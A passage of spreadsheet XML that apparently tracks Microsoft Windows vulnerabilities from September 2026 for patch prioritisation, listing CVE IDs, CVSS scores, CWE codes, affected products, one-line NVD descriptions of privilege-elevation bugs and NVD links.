      <c r="R983" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S983" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D984" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F984" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G984" s="5" t="inlineStr"/>
      <c r="H984" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I984" s="5" t="inlineStr"/>
      <c r="J984" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K98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84" s="5" t="inlineStr"/>
      <c r="M984" s="5" t="inlineStr"/>
      <c r="N984" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O984" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P984" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q984" s="5" t="inlineStr"/>
      <c r="R984" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S984" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D985" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F985" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G985" s="5" t="inlineStr"/>
      <c r="H985" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I985" s="5" t="inlineStr"/>
      <c r="J985" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K98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85" s="5" t="inlineStr"/>
      <c r="M985" s="5" t="inlineStr"/>
      <c r="N985" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P985" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q985" s="5" t="inlineStr"/>
      <c r="R985" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="S985" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D986" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F986" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G986" s="5" t="inlineStr"/>
      <c r="H986" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I986" s="5" t="inlineStr"/>
      <c r="J986" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K986"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986" s="5" t="inlineStr"/>
      <c r="M986" s="5" t="inlineStr"/>
      <c r="N986" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P986" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q986" s="5" t="inlineStr"/>
      <c r="R986" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S986" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D987" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F987" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G987" s="5" t="inlineStr"/>
      <c r="H987" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I987" s="5" t="inlineStr"/>
      <c r="J987" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K987"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987" s="5" t="inlineStr"/>
      <c r="M987" s="5" t="inlineStr"/>
      <c r="N987" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P987" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q987" s="5" t="inlineStr"/>
      <c r="R987" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S987" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D988" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F988" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G988" s="5" t="inlineStr"/>
      <c r="H988" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I988" s="5" t="inlineStr"/>
      <c r="J988" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K98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988" s="5" t="inlineStr"/>
      <c r="M988" s="5" t="inlineStr"/>
      <c r="N988" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P988" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q988" s="5" t="inlineStr"/>
      <c r="R988" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S988" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D989" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F989" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G989" s="5" t="inlineStr"/>
      <c r="H989" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I989" s="5" t="inlineStr"/>
      <c r="J989" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K989" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L989" s="5" t="inlineStr"/>
      <c r="M989" s="5" t="inlineStr"/>
      <c r="N989" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P989" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q989" s="5" t="inlineStr"/>
      <c r="R989" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S989" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D990" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F990" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G990" s="5" t="inlineStr"/>
      <c r="H990" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I990" s="5" t="inlineStr"/>
      <c r="J990" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K99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90" s="5" t="inlineStr"/>
      <c r="M990" s="5" t="inlineStr"/>
      <c r="N990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O990" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P990" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q990" s="5" t="inlineStr"/>
      <c r="R990" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S990" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D991" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F991" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G991" s="5" t="inlineStr"/>
      <c r="H991" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I991" s="5" t="inlineStr"/>
      <c r="J991" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K99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91" s="5" t="inlineStr"/>
      <c r="M991" s="5" t="inlineStr"/>
      <c r="N991" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O991" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P991" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q991" s="5" t="inlineStr"/>
      <c r="R991" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S991" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="D992" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F992" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G992" s="5" t="inlineStr"/>
      <c r="H992" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I992" s="5" t="inlineStr"/>
      <c r="J992" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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92" s="5" t="inlineStr"/>
      <c r="M992" s="5" t="inlineStr"/>
      <c r="N992" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P992" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q992" s="5" t="inlineStr"/>
      <c r="R992" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S992" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D993" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F993" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G993" s="5" t="inlineStr"/>
      <c r="H993" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I993" s="5" t="inlineStr"/>
      <c r="J993" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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93" s="5" t="inlineStr"/>
      <c r="M993" s="5" t="inlineStr"/>
      <c r="N993" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O993" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P993" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q993" s="5" t="inlineStr"/>
      <c r="R993" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S993" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D994" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F994" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G994" s="5" t="inlineStr"/>
      <c r="H994" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I994" s="5" t="inlineStr"/>
      <c r="J994" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K994" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L994" s="5" t="inlineStr"/>
      <c r="M994" s="5" t="inlineStr"/>
      <c r="N994" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O994" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P994" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q994" s="5" t="inlineStr"/>
      <c r="R994" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S994" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D995" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F995" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G995" s="5" t="inlineStr"/>
      <c r="H995" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I995" s="5" t="inlineStr"/>
      <c r="J995" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K99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95" s="5" t="inlineStr"/>
      <c r="M995" s="5" t="inlineStr"/>
      <c r="N995" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O995" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P995" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q995" s="5" t="inlineStr"/>
      <c r="R995" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S995" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D996" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F996" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I996" s="5" t="inlineStr"/>
      <c r="J996" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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996" s="5" t="inlineStr"/>
      <c r="M996" s="5" t="inlineStr"/>
      <c r="N996" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O996" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P996" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q996" s="5" t="inlineStr"/>
      <c r="R996" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S996" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70577</t>
        </is>
      </c>
      <c r="D997" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F997" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I997" s="5" t="inlineStr"/>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr"/>
      <c r="L997" s="5" t="inlineStr"/>
      <c r="M997" s="5" t="inlineStr"/>
      <c r="N997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O997" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P997" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q997" s="5" t="inlineStr"/>
      <c r="R997" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S997" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70578</t>
        </is>
      </c>
      <c r="D998" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F998" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I998" s="5" t="inlineStr"/>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr"/>
      <c r="L998" s="5" t="inlineStr"/>
      <c r="M998" s="5" t="inlineStr"/>
      <c r="N998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O998" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P998" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q998" s="5" t="inlineStr"/>
      <c r="R998" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S998" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70585</t>
        </is>
      </c>
      <c r="D999" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F999" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I999" s="5" t="inlineStr"/>
      <c r="J999" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K999" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L999" s="5" t="inlineStr"/>
      <c r="M999" s="5" t="inlineStr"/>
      <c r="N999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O999" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P999" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q999" s="5" t="inlineStr"/>
      <c r="R999" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S999" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D1000" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1000" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1000" s="5" t="inlineStr"/>
      <c r="H1000" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1000" s="5" t="inlineStr"/>
      <c r="J1000" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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000" s="5" t="inlineStr"/>
      <c r="M1000" s="5" t="inlineStr"/>
      <c r="N1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1000" s="5" t="inlineStr"/>
      <c r="R1000" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1000" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
